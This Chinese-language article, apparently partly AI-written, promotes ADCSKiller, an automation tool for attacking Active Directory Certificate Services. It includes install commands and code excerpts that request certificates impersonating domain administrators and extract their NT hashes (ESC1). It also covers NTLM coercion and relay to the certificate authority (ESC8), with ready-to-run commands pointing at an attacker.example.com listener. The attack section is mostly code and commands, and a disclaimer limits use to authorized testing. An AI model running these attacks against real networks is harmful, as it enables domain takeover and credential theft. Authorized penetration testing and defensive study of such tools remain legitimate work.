ADCSKiller:终极ADCS漏洞自动化武器化工具完整指南

发布时间:2026/7/14 7:16:58

ADCSKiller:终极ADCS漏洞自动化武器化工具完整指南
ADCSKiller终极ADCS漏洞自动化武器化工具完整指南【免费下载链接】ADCSKillerAn ADCS Exploitation Automation Tool Weaponizing Certipy and Coercer项目地址: https://gitcode.com/gh_mirrors/ad/ADCSKillerADCSKiller是一款基于Python的ADCS漏洞自动化武器化工具它整合了Certipy和Coercer的核心功能能够简化Active Directory证书服务ADCS基础设施的攻击流程。无论是漏洞发现还是利用执行这款工具都能为安全测试人员提供高效的自动化支持目前已成为ADCS渗透测试领域的重要工具。为什么选择ADCSKiller在企业网络安全评估中ADCS漏洞往往是攻击者获取域管理员权限的关键途径。传统测试方法需要手动操作多个工具步骤繁琐且容易出错。ADCSKiller的出现解决了这一痛点全流程自动化从证书模板枚举到漏洞利用无需人工干预多漏洞支持已集成ESC1、ESC8等常见ADCS漏洞检测与利用模块模块化设计基于Certipy和Coercer构建兼顾稳定性与扩展性详细输出报告自动生成JSON格式结果文件便于后续分析快速安装步骤使用前需确保系统已安装Python 3.6环境然后通过以下命令完成部署# 克隆项目仓库 git clone https://gitcode.com/gh_mirrors/ad/ADCSKiller cd ADCSKiller # 安装依赖组件 pip install -r requirements.txt # 安装Certipy git clone https://github.com/ly4k/Certipy cd Certipy python3 setup.py install # 安装Coercer git clone https://github.com/p0dalirius/Coercer cd Coercer pip install -r requirements.txt python3 setup.py install核心功能解析1. 漏洞自动发现ADCSKiller通过Certipy的枚举功能能够自动识别域内易受攻击的证书模板# 代码片段adcskiller.py 第98-125行 print([*] Trying to find vulnerable certificate templates) certipy_results subprocess.run([certipy, find, -u, f{self.__username}{self.__domain}, -p, self.__password, -dc-ip, self.__target, -vulnerable, -json, -output, self.__certipy_output_prefix], capture_outputTrue, textTrue).stdout工具会重点检测以下漏洞类型ESC1低权限用户可申请高权限证书ESC8证书服务中继攻击漏洞其他ADCS相关配置缺陷2. 域管理员权限获取针对发现的ESC1漏洞ADCSKiller会自动执行证书申请与哈希提取流程# 代码片段adcskiller.py 第298-313行 def exploit_esc1(self) - None: for admin in self.__domain_admins: for template in self.__vulnerable_certificate_templates[ESC1]: print(f[*] Exploiting ESC1 using the {admin} account) certipy_results subprocess.run([certipy, req, -u, f{self.__username}{self.__domain}, -p, self.__password, -target, self.__target, -ca, self.__ca, -template, template, -upn, admin, -out, f{template}_{admin}], capture_outputTrue, textTrue).stdout if Got certificate in certipy_results: print(f[] Got certificate for UPN {admin}) certipy_results subprocess.run([certipy, auth, -pfx, f{template}_{admin}.pfx, -domain, self.__domain, -username, admin, -dc-ip, self.__target], capture_outputTrue, textTrue).stdout if Got hash for in certipy_results: nthash re.search(rGot hash for .*: (\w:\w), certipy_results).group(1) print(f[] Received NT hash for {admin}: {nthash})3. 证书服务中继攻击对于ESC8漏洞工具采用多线程方式协调Certipy和Coercer进行攻击# 代码片段adcskiller.py 第314-343行 def exploit_esc8(self) - None: if self.__ca_dns not in self.__dc: print(f[*] Certificate authority {self.__ca_dns} is not a domain controller) certipy_thread CertipyRelay(1, CertipyRelayThread, self.__ca_dns) certipy_thread.start() time.sleep(5) coercer_thread Coercer(2, CoercerThread, self.__domain, self.__username, self.__password, self.__dc[0], self.__lhost) coercer_thread.start() coercer_thread.join() certipy_thread.join()基础使用指南命令格式ADCSKiller的基本调用格式如下python adcskiller.py -d 域名 -u 用户名 -p 密码 -dc-ip 域控IP -L 监听主机参数说明参数说明示例-d, --domain目标域名FQDN格式example.com-u, --username域用户名testuser-p, --password用户密码Pssw0rd!-dc-ip域控制器IP地址192.168.1.100-L, --lhost监听主机FQDNattacker.example.com典型使用场景场景1检测并利用ESC1漏洞python adcskiller.py -d example.com -u lowpriv -p LowPass123! -dc-ip 10.0.0.1 -L attacker.example.com执行后工具会枚举域内所有易受攻击的证书模板尝试为每个域管理员申请证书从证书中提取NTLM哈希场景2执行ESC8中继攻击当检测到证书服务未安装在域控制器上时工具会自动启动中继攻击流程获取高权限证书。高级配置与扩展输出文件解析工具会生成JSON格式的Certipy输出文件如20231115143022_Certipy.json包含以下关键信息证书颁发机构详情漏洞证书模板列表域管理员信息域控制器列表自定义漏洞模块ADCSKiller采用模块化设计可通过修改exploit_escX方法添加新的漏洞利用逻辑例如在Exploit类中添加def exploit_esc3(self) - None: # 自定义ESC3漏洞利用代码 pass然后在run_exploits方法中注册该模块certificate_exploits { ESC1: self.exploit_esc1, ESC3: self.exploit_esc3 # 添加新模块 }注意事项与法律声明授权测试使用ADCSKiller仅可在已获得明确授权的网络环境中进行法律合规未经授权的使用可能违反当地法律法规版本更新工具目前处于0.3版本后续将添加更多漏洞检测模块免责声明作者不对工具的非法使用承担任何责任参考资料项目许可证LICENSE核心代码实现adcskiller.pyCertipy项目https://github.com/ly4k/CertipyCoercer项目https://github.com/p0dalirius/Coercer通过ADCSKiller安全测试人员能够快速评估企业ADCS基础设施的安全状况及时发现并修复潜在漏洞有效防范证书服务相关的攻击风险。随着工具的不断更新它将成为ADCS安全评估领域不可或缺的自动化解决方案。【免费下载链接】ADCSKillerAn ADCS Exploitation Automation Tool Weaponizing Certipy and Coercer项目地址: https://gitcode.com/gh_mirrors/ad/ADCSKiller创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

相关新闻

各国都喜欢宝石,风格有差异

各国都喜欢宝石,风格有差异

2026/7/14 7:06:57

人天生喜欢宝石黄金。我一直呼吁电脑、车辆上大量镶嵌宝石。现在人工合成,非常便宜。各国风格不同。印度人:宝石越大越好。日本人:个头可小,要闪闪发光。中国人:要纯净品质。

AI车牌识别技术解析:10万摄像头部署与隐私风险

AI车牌识别技术解析:10万摄像头部署与隐私风险

2026/7/14 7:06:57

这次我们来看一个涉及AI监控摄像头的社会技术议题。美国多地爆发的反Flock摄像头抗议活动,揭示了10万只AI车牌识别摄像头正在大规模部署,并与移民海关执法局(ICE)数据共享的现状。这个事件不仅关乎隐私权争议,更涉及AI…

梦笔记20260714

梦笔记20260714

2026/7/14 7:06:57

在老家北边的马路上,突然想起这几天与人约好讨论泰山OFFICE的事。我给忘记了。一会看到对方开着个木屋飞速过来,还漂移。我赶紧进去,里面是对方的全体员工。桌子上是个讨论协议。我说要从头念一遍,没兴趣的先出去玩吧。墙上有一副…

Meta-Llama-3.1-8B-Instruct_rai_1.7.1_hybrid与原生模型对比:为什么混合优化架构更胜一筹?

Meta-Llama-3.1-8B-Instruct_rai_1.7.1_hybrid与原生模型对比:为什么混合优化架构更胜一筹?

2026/7/14 8:57:09

Meta-Llama-3.1-8B-Instruct_rai_1.7.1_hybrid与原生模型对比:为什么混合优化架构更胜一筹? 【免费下载链接】Meta-Llama-3.1-8B-Instruct_rai_1.7.1_hybrid 项目地址: https://ai.gitcode.com/hf_mirrors/amd/Meta-Llama-3.1-8B-Instruct_rai_1.7.1_…

Hermes Agent模型路由策略:Sakana Fugu与GLM 5.2的智能任务分发实践

Hermes Agent模型路由策略:Sakana Fugu与GLM 5.2的智能任务分发实践

2026/7/14 8:57:09

最近在测试 Hermes Agent 时,我发现一个很有意思的现象:当我把同一个任务分别交给 Sakana Fugu 和 GLM 5.2 处理时,结果差异比我想象的要大得多。这不仅仅是“哪个模型更强”的问题,而是涉及到模型路由策略、任务适配性和实际工作…

微信小程序WXML语法详解与实战技巧

微信小程序WXML语法详解与实战技巧

2026/7/14 8:57:09

1. WXML语法基础与核心概念 WXML(WeiXin Markup Language)是微信小程序框架设计的标签语言,它并非传统HTML的超集,而是专门为小程序设计的声明式模板语言。与HTML相比,WXML最显著的特点是数据驱动和组件化设计。在实际…

DLSS Swapper:3步解决游戏画质与性能的终极平衡难题

DLSS Swapper:3步解决游戏画质与性能的终极平衡难题

2026/7/14 8:57:09

DLSS Swapper:3步解决游戏画质与性能的终极平衡难题 【免费下载链接】dlss-swapper 项目地址: https://gitcode.com/GitHub_Trending/dl/dlss-swapper 你是否曾经遇到过这样的困扰:最新的大作游戏因为DLSS版本过时而出现画面模糊,或者…

Qwen3-VL多模态大模型:视觉语言理解与生成实战

Qwen3-VL多模态大模型:视觉语言理解与生成实战

2026/7/14 8:57:09

1. Qwen3-VL项目概述Qwen3-VL是通义千问团队推出的第三代多模态大语言模型,在视觉-语言理解与生成任务上展现出突破性能力。作为当前最先进的开源视觉语言模型之一,它不仅继承了Qwen系列在纯文本任务上的优异表现,更通过创新的架构设计实现了…

gala-ragdoll开发者指南:如何扩展自定义配置解析器

gala-ragdoll开发者指南:如何扩展自定义配置解析器

2026/7/14 8:47:08

gala-ragdoll开发者指南:如何扩展自定义配置解析器 【免费下载链接】gala-ragdoll An OS-level configuration management service 项目地址: https://gitcode.com/openeuler/gala-ragdoll 前往项目官网免费下载:https://ar.openeuler.org/ar/ g…

Unity游戏文本翻译架构深度解析:XUnity.AutoTranslator的技术实现与工程实践

Unity游戏文本翻译架构深度解析:XUnity.AutoTranslator的技术实现与工程实践

2026/7/13 7:41:16

Unity游戏文本翻译架构深度解析:XUnity.AutoTranslator的技术实现与工程实践 【免费下载链接】XUnity.AutoTranslator 项目地址: https://gitcode.com/gh_mirrors/xu/XUnity.AutoTranslator XUnity.AutoTranslator作为Unity游戏社区中最成熟的文本翻译解决方…

openEuler Raspberry Pi Kernel设备驱动开发指南:为树莓派硬件添加支持

openEuler Raspberry Pi Kernel设备驱动开发指南:为树莓派硬件添加支持

2026/7/13 20:43:19

openEuler Raspberry Pi Kernel设备驱动开发指南:为树莓派硬件添加支持 【免费下载链接】raspberrypi-kernel It provides openEuler kernel source for Raspberry Pi 项目地址: https://gitcode.com/openeuler/raspberrypi-kernel 前往项目官网免费下载&…

openEuler系统集成测试实战:基于smoke-test套件的环境验证技巧

openEuler系统集成测试实战:基于smoke-test套件的环境验证技巧

2026/7/13 20:43:10

openEuler系统集成测试实战:基于smoke-test套件的环境验证技巧 【免费下载链接】integration-test The repo contains test suits for system integration test 项目地址: https://gitcode.com/openeuler/integration-test 前往项目官网免费下载:…

XUnity.AutoTranslator 游戏实时翻译插件:从原理到实战的完整指南

XUnity.AutoTranslator 游戏实时翻译插件:从原理到实战的完整指南

2026/7/14 0:06:37

1. 项目概述:当游戏语言成为一堵墙作为一名玩了十几年日系、欧美独立游戏的“老油条”,我太懂那种面对一款心仪已久、画风玩法都戳中G点的游戏,却因为语言不通而望而却步的痛了。尤其是那些基于Unity引擎开发的、体量不大但内容精良的作品&am…

2026普通文员学数据分析的价值

2026普通文员学数据分析的价值

2026/7/14 0:06:37

一、2026年普通文员学习数据分析的必要性随着数字化转型加速,数据分析技能正逐渐成为职场基础能力。普通文员学习数据分析可以提升工作效率、增强竞争力,并为职业转型提供更多可能性。二、数据分析对文员的价值自动化办公:通过数据分析工具&a…

2026从计划员到主管,生产管理者学数据分析有用吗?

2026从计划员到主管,生产管理者学数据分析有用吗?

2026/7/14 0:06:37

一、生产管理领域的职业发展路径 从计划员到主管的角色转变,是生产管理者职业发展的典型路径。计划员主要负责生产排程、库存管理和资源协调等基础工作,而主管则需要承担团队管理、决策支持和效率优化等更高级别的职责。这种转变不仅仅是职位的提升&…